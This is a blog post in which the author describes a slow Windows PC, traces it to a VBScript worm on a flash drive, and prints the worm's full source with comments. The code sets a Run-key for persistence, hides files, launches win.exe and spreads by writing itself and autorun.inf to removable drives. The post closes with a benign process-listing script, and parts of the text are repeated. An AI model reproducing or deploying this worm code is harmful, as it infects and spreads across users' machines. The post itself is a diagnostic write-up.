VB Script: How to create a virus?
Since quite a couple of weeks I was having slow PC; and eventually dying for a restart. I turned off all of the windows services, I removed all un-necessary software and even those that were necessary but having low usage-frequency. Still to no avail. Then I went through my registry to cleanup unwanted run and run once's.
As I turn on the computer I could see a lot of wscript's running, about tens of them, hogging my CPU and memory like anything. I thought it might be network policy imposed by network department; I used to close all of the running scripts one by one. But an eventual talk to network admin revealed that no PC "runs" the policy on PC start-up, and that they do not have to do anything with the wscript.exe scripts.
Running Symantec EndPoint Protection software that has an up-to-date virus definitions, I could not imagine a virus in my pc.
Most people think that WScript.EXE is a virus, which it is not. Its a windows script hosting(WSH) software. Also, I have used WScript quite a couple of times myself, and probably so is the reason I never thought of removing that exe.
It can potentially execute commands(VB or JScript) that you may not want/desire.
Following is a simple example taken from MSDN, to write in registry.
So, long story short, this always used to happen when it insert my flash drive in the system. Couple of days ago, I cancelled the Action window that pops up when you insert a flash drive. I browsed the drive using Control+E (Windows Explorer) and to my astonishment I found a .VBS file; which is basically the VB Script file. I renamed the file and opened it. It was the code that was hogging my PC!
Though, I did not like the slow the PC at all, because I couldnt work; but interestingly I did enjoy reading the code (0:
Following is what I found when I opened d.vbs file; I have added a couple of comments just for the reader to better understand the code.
Happy diagnosing the virus! (0:
NOTE:
If you see alot of wscript.exe's running on your machine, and you still doubt their actions; copy and paste the following code into Check for virus.VBS file, and double click to run it.
The following code prints, in form of message box, all of the scripts that is being run under wscript.exe program.
Keep on pressing the OK button to see the list of scripts being run under wscripts.exe
Enjoy!
As I turn on the computer I could see a lot of wscript's running, about tens of them, hogging my CPU and memory like anything. I thought it might be network policy imposed by network department; I used to close all of the running scripts one by one. But an eventual talk to network admin revealed that no PC "runs" the policy on PC start-up, and that they do not have to do anything with the wscript.exe scripts.
Running Symantec EndPoint Protection software that has an up-to-date virus definitions, I could not imagine a virus in my pc.
Most people think that WScript.EXE is a virus, which it is not. Its a windows script hosting(WSH) software. Also, I have used WScript quite a couple of times myself, and probably so is the reason I never thought of removing that exe.
It can potentially execute commands(VB or JScript) that you may not want/desire.
Following is a simple example taken from MSDN, to write in registry.
Dim WshShell, bKey Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY" WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ" bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\") WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader") WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader" WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\" WshShell.RegDelete "HKCU\Software\ACME\"
So, long story short, this always used to happen when it insert my flash drive in the system. Couple of days ago, I cancelled the Action window that pops up when you insert a flash drive. I browsed the drive using Control+E (Windows Explorer) and to my astonishment I found a .VBS file; which is basically the VB Script file. I renamed the file and opened it. It was the code that was hogging my PC!
Though, I did not like the slow the PC at all, because I couldnt work; but interestingly I did enjoy reading the code (0:
Following is what I found when I opened d.vbs file; I have added a couple of comments just for the reader to better understand the code.
On Error Resume Next set objfso=CreateObject("Scripting.fileSystemObject" 'causes execution to continue with the statement Set ws = CreateObject("wscript.Shell") ' Create a shell object Set sh = CreateObject("Shell.application") sour="C:\Tempe" if objfso.FolderEXists(sour) Then ' Look for a folder set tf =objfso.getFolder(sour) tf.Attributes=39 End If a=0 b=10 c=10 'Tweaking the registry ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer", sour & "\" &"d.vbs" ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD" ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD" ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1" if a=0 Then if objfso.FileExists("C:\Tempe\win.exe") Then ws.Run("C:\Tempe\win.exe") end if end if Do For Each flashdrive In objfso.drives If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path<>"A:" Then If (flashdrive.drivetype = 1) Then pet=flashdrive.path & "\" set tf=objfso.createtextfile(pet & "autorun.inf") tf.writeline "[autorun]" tf.writeline "shellexecute=wscript.exe d.vbs" tf.writeline "shell=Open" tf.writeline "Shell\Open\Command=wscript.exe d.vbs" tf.writeline "Action=Open to View Folder" tf.writeline "Icon=tere.ico" tf.close set tf =objfso.getfile(pet & "autorun.inf") tf.Attributes=39 if objfso.FileExists(pet&"autorun.inf") Then set f = objfso.getfile(pet&"autorun.inf") size = f.size set text=f.openastextstream(1,-2) do while not text.atendofstream source=source&text.readline source=source & vbcrlf loop end if if tf=source Then sour="C:\Tempe" Else set f = objfso.getfile(pet&"autorun.inf") objfso.DeleteFile(f) End If If a=0 Then ws.Run(pet) ws.run(pet&"win.exe") End If a=a+1 sour="C:\Tempe" pet=flashdrive.path & "\" dest=flashdrive.path & "\Tempe" sours="C:\Tempe\" if a=3 Then If objfso.FileExists(pet&"autorun.inf") Then objfso.DeleteFile(pet&"autorun.inf") set Fol=objfso.GetFolder(sour) set tf=objfso.createtextfile(pet & "autorun.inf") tf.writeline "[autorun]" tf.writeline "shellexecute=wscript.exe d.vbs" tf.writeline "shell=Open" tf.writeline "Shell\Open\Command=wscript.exe d.vbs" tf.writeline "Action=Open to View Folder" tf.writeline "Icon=tere.ico" tf.close set tf =objfso.getfile(pet & "autorun.inf") tf.Attributes=39 End If End If If objfso.FileExists(pet&"d.vbs") Then sour="C:\Tempe" Else set Fol=objfso.GetFolder(sour) set f=objfso.GetFile(Fol&"\d.vbs") objfso.CopyFile f, pet, OverWriteFiles set f =objfso.getfile(pet & "d.vbs") f.Attributes=39 set f=objfso.GetFile(Fol&"\win.exe") objfso.CopyFile f, pet, OverWriteFiles set f =objfso.getfile(pet & "win.exe") f.Attributes=39 set f=objfso.GetFile(Fol&"\tere.ico") objfso.CopyFile f, pet, OverWriteFiles set f =objfso.getfile(pet & "tere.ico") f.Attributes=39 set tf=objfso.createtextfile(pet & "autorun.inf") tf.writeline "[autorun]" tf.writeline "shellexecute=wscript.exe d.vbs" tf.writeline "shell=Open" tf.writeline "Shell\Open\Command=wscript.exe d.vbs" tf.writeline "Action=Open to View Folder" tf.writeline "Icon=tere.ico" tf.close set tf =objfso.getfile(pet & "autorun.inf") tf.Attributes=39 set mf = objfso.getfile(pet&"autorun.inf") size = mf.size set text=mf.openastextstream(1,-2) do while not text.atendofstream source=source&text.readline source=source & vbcrlf loop End If If objfso.FolderExists (sour) Then set Fol=objfso.GetFolder(sour) End If If objfso.FileExists("C:\Tempe\d.vbs") Then sour="C:\Tempe" Else set tf=objfso.createFolder("C:\"& "Tempe") set Fol=objfso.GetFolder(sour) Fol.Attributes=39 set f=objfso.GetFile(pet&"d.vbs") objfso.CopyFile f, sours, OverWriteFiles set f =objfso.getfile(sour & "\d.vbs") f.Attributes=39 set f=objfso.GetFile(pet&"tere.ico") objfso.CopyFile f, sours, OverWriteFiles set f =objfso.getfile(sour & "\tere.ico") f.Attributes=39 set f=objfso.GetFile(pet&"win.exe") objfso.CopyFile f, sours, OverWriteFiles set f =objfso.getfile(sour & "\win.exe") f.Attributes=39 End If set mf = objfso.getfile(pet&"autorun.inf") size = mf.size set text=mf.openastextstream(1,-2) do while not text.atendofstream source=source&text.readline source=source & vbcrlf loop if a=3 Then a=1 End If End If End If Next if check<>1 Then Wscript.sleep 10000 end if set mf = objfso.getfile(Wscript.ScriptFullname) size = mf.size set text=mf.openastextstream(1,-2) do while not text.atendofstream source=source&text.readline source=source & vbcrlf loop Loop While (check <> 1)
Happy diagnosing the virus! (0:
NOTE:
If you see alot of wscript.exe's running on your machine, and you still doubt their actions; copy and paste the following code into Check for virus.VBS file, and double click to run it.
The following code prints, in form of message box, all of the scripts that is being run under wscript.exe program.
strComputer = "." Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") Set colItems = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = 'cscript.exe'" & _ " OR Name = 'wscript.exe'") For Each objItem in colItems Wscript.Echo objItem.CommandLine Next
Keep on pressing the OK button to see the list of scripts being run under wscripts.exe
Enjoy!